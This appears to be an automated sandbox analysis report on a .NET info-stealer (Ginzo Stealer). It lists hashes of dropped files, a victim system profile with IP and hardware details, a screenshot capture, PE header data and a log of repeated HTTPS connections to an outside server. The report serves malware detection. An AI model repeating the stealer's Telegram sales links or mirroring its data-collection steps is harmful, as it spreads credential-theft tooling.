SSDEEP:	24:TwdgExX6lswcsA1Wo1+js3mQmFlw2UJh6QHssg9RGVQ8:T6KiV+KmQmFwhtMp9RGVH
MD5:	D910958AF930D9DCA27D8F529EC053D0
SHA1:	321478679C760C347743149A323469AD4BFEA87D
SHA-256:	C70010ABE33AC34A7DB2F84B5ECDEA5EF95D482B69138707C126D2C1C1B67F37
SHA-512:	0BCADFF480F8F0C7E5DDC316F678564A75785640F151ACA644CABE64AD10D0D4AD6156385A4B04DF9025C6ADCDB3787123EC21F57610F1A7FBC7727A12EB8A00
Malicious:	false
Preview:	TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\TQDFJHPUIU.png

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697771666106845
Encrypted:	false
SSDEEP:	24:TwdgExX6lswcsA1Wo1+js3mQmFlw2UJh6QHssg9RGVQ8:T6KiV+KmQmFwhtMp9RGVH
MD5:	D910958AF930D9DCA27D8F529EC053D0
SHA1:	321478679C760C347743149A323469AD4BFEA87D
SHA-256:	C70010ABE33AC34A7DB2F84B5ECDEA5EF95D482B69138707C126D2C1C1B67F37
SHA-512:	0BCADFF480F8F0C7E5DDC316F678564A75785640F151ACA644CABE64AD10D0D4AD6156385A4B04DF9025C6ADCDB3787123EC21F57610F1A7FBC7727A12EB8A00
Malicious:	false
Preview:	TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\TQDGENUHWP.jpg

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\ZGGKNSUKOP.png

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\g1nz0l1s7\Information.txt

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	UTF-8 Unicode text
Category:	dropped
Size (bytes):	388
Entropy (8bit):	5.390986714334908
Encrypted:	false
SSDEEP:	6:ONRRCu1mzTgJ2vNNyvc8DoTpKWUkQMKw3NNpP4PdIUtLW2MSE1EWWYufTn:QsfzTgsFEvch/zqPdISLWSEivYYTn
MD5:	A6B0CE1A3651955F68066B531AB1B4D6
SHA1:	0272A7B8F591012702B715DA4DEF907C7E0706D6
SHA-256:	128812B27DC5D33CD920227C4B95E1A38300E321D15D1089B150573921E424E9
SHA-512:	60A37A42532CBE488595A879CC2FDB0D06C77BB93A60695B25D5BE7946CD197E42DA8A0B0AEE5092612CDB400B123F007099D1C9864C26C0AF38F823DD6E4646
Malicious:	false
Preview:	Absolutely free Ginzo Stealer: https://t.me/ginzostealer_bot.Buy holdthismoney's Stealer: https://t.me/holdthismoneybot..Report Date & Time: 7/13/2022 6:20:48 AM..IP Address: 84.17.52.14 (zipcode: 8001).Country & City: CH, Z..rich..OS: Windows 10 Pro (x64 BIT).PC Name: 287400.Username: user.Resolution: 1280x1024..GPU: 86G2ATNK.CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.RAM: 4094MB

C:\Users\user\AppData\Local\g1nz0l1s7\Screenshot.png

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	827782
Entropy (8bit):	7.945649941698491
Encrypted:	false
SSDEEP:	12288:pe+N8GD7EphA9kaMfoQjfB5upQhKqTdFuIOcS4UjKWxrZvJ9C25pge4f4yyZ4ty:prN8nA9qLIK7uImmCrZvJ9B5v4Qyc9
MD5:	C2812A2B3889A3C553A58365DC4439E1
SHA1:	723AA6892D8DF11D96FEF0CCA86F5BE659C90BE6
SHA-256:	B84C9E3654208FBBD0711EF9B751759A1AA5029158C61D91F5FF058FD2655128
SHA-512:	45B63151854C25328F102436E7A0D8C19632D346C7B561CF544D5DDE0F1FA950A437F36A9748895FEF75AF032F6140640B00EDAB07E29556DC11E006A55F53E0
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....,Gy.s...$.A('..`c.......6,Nk..xwY. .s0I$I..$P.D.L.....&.......B.%..W......\|..oUw...s....<s..........YY...n.U..o.....X..wj~7..............;>2be....U.K....ccv~LL.N.c....#......_......o.a.....w\|....m..b...\|P`u..u..p....Xn....K3.\y.<k.9.d..=......b..be.9...#..U_...2R...m....)<(.....+.x.....q.{.b.....f.^.i`e...f......g.o..C.k.oa..b.r.`.$.....f...:o.......?.74F.Ds.....c....&1.>n.......h.L\...c...X.-...f.}. e....S.........$v{b9.>a..V..?. ....[..%..R1.W..9..-Gu...x(..B.^.1..h.....c...?...N_.....;>,...\...G...<....6..6...o...`.......'..5..q...M.a.X.....8.B.....XZ..;.&..{...4..Ov2..SZ.h)........?A......g......W)Y.bg..Cu..o)....Ge.e..T.7..',..4`...5!..g...[...K.8.h..i..#1....f).3,.`..\|],..h4....z.....5H.....?....:}.>8.G.b.].....p.kk... ..X.c.....8.cT..h....a`.m.e{X..,-......=.F..........h2...).S..2...`..... .............`/.^.....lH.@.o...:.H:\|o.[0...?..c.x..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.02655869721
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	dBvNa2pTbj.exe
File size:	429568
MD5:	628e04a5c298a35bd396b74a42d237fe
SHA1:	d90d76f790f1ad0ab95c3bd4bb4fb8dcada77691
SHA256:	66a0c9b894ef78540ddf8b1909b3a227789df7bd4ddcdf5cb3aaf4098493c296
SHA512:	6f1204163ac327166d59038d5b859471a45f94e99c5254cad16ef33ab9db7c48cff3da55312ddfc30b34079efcc6101a4dbd7445bf19ce05af4a94fbea490746
SSDEEP:	12288:Ibf2i6btFx5Uf7moCqUSg6R43gcWc2yUWDcJIhs04Fkaatvap0+o1VhCHfZn7o50:IbP0th5LqU
TLSH:	FA94459D726072DFC857D472DEA82DA8EA6174BB931F4203902715ADEE4D89BCF140F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D............"...0..v...............@... ....@.. ....................... ............`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x46e00a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9BB84413 [Mon Oct 14 18:48:51 2052 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0046E000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24dc4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6c000	0x556	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x70000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x24d68	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6e000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x24000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
X99^i@	0x2000	0x20b14	0x20c00	False	1.0003801884541985	data	7.998809128626319	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x24000	0x4739c	0x47400	False	0.3114412006578947	data	4.3569361501714585	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6c000	0x556	0x600	False	0.3977864583333333	data	3.906257383176619	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x6e000	0x10	0x200	False	0.044921875	data	0.12227588125913882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x70000	0xc	0x200	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x6c0a0	0x2cc	data
RT_MANIFEST	0x6c36c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 13, 2022 06:20:45.674350977 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:45.674421072 CEST	443	49751	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:45.674516916 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:45.703902006 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:45.703943014 CEST	443	49751	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:45.758271933 CEST	443	49751	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:45.758399010 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:45.763750076 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:45.763766050 CEST	443	49751	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:45.764003038 CEST	443	49751	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:45.868021965 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.185838938 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.232492924 CEST	443	49751	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.296497107 CEST	443	49751	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.296587944 CEST	443	49751	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.296664000 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.305094957 CEST	49751	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.325908899 CEST	49752	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.325984955 CEST	443	49752	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.326116085 CEST	49752	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.326513052 CEST	49752	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.326543093 CEST	443	49752	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.367347956 CEST	443	49752	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.386209965 CEST	49752	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.386254072 CEST	443	49752	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.497318029 CEST	443	49752	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.497467041 CEST	443	49752	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.497581959 CEST	49752	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.498522043 CEST	49752	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.501075029 CEST	49753	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.501107931 CEST	443	49753	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.501200914 CEST	49753	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.501533031 CEST	49753	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.501543999 CEST	443	49753	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.544661045 CEST	443	49753	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.547252893 CEST	49753	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.547281981 CEST	443	49753	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.663964033 CEST	443	49753	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.664113998 CEST	443	49753	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.664231062 CEST	49753	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.665155888 CEST	49753	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.669605970 CEST	49754	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.669662952 CEST	443	49754	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.669770002 CEST	49754	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.670202971 CEST	49754	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.670229912 CEST	443	49754	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.711256981 CEST	443	49754	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.714297056 CEST	49754	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.714335918 CEST	443	49754	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.798495054 CEST	443	49754	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.798739910 CEST	443	49754	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.798850060 CEST	49754	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.799631119 CEST	49754	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.803049088 CEST	49756	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.803105116 CEST	443	49756	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.803215981 CEST	49756	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.803572893 CEST	49756	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.803594112 CEST	443	49756	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.846071005 CEST	443	49756	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.849847078 CEST	49756	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.849869013 CEST	443	49756	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.974330902 CEST	443	49756	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.974487066 CEST	443	49756	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.974571943 CEST	49756	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.975630999 CEST	49756	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.987112045 CEST	49757	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.987185001 CEST	443	49757	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:46.987303019 CEST	49757	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.987763882 CEST	49757	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:46.987793922 CEST	443	49757	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.029351950 CEST	443	49757	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.043766022 CEST	49757	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.043832064 CEST	443	49757	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.145858049 CEST	443	49757	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.145976067 CEST	443	49757	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.146090984 CEST	49757	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.146933079 CEST	49757	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.182837009 CEST	49758	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.182905912 CEST	443	49758	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.183003902 CEST	49758	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.183473110 CEST	49758	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.183499098 CEST	443	49758	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.227729082 CEST	443	49758	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.230526924 CEST	49758	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.230581999 CEST	443	49758	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.365338087 CEST	443	49758	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.365533113 CEST	443	49758	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.365678072 CEST	49758	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.366403103 CEST	49758	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.369034052 CEST	49759	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.369095087 CEST	443	49759	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.369239092 CEST	49759	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.369530916 CEST	49759	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.369554996 CEST	443	49759	188.114.96.3	192.168.2.5
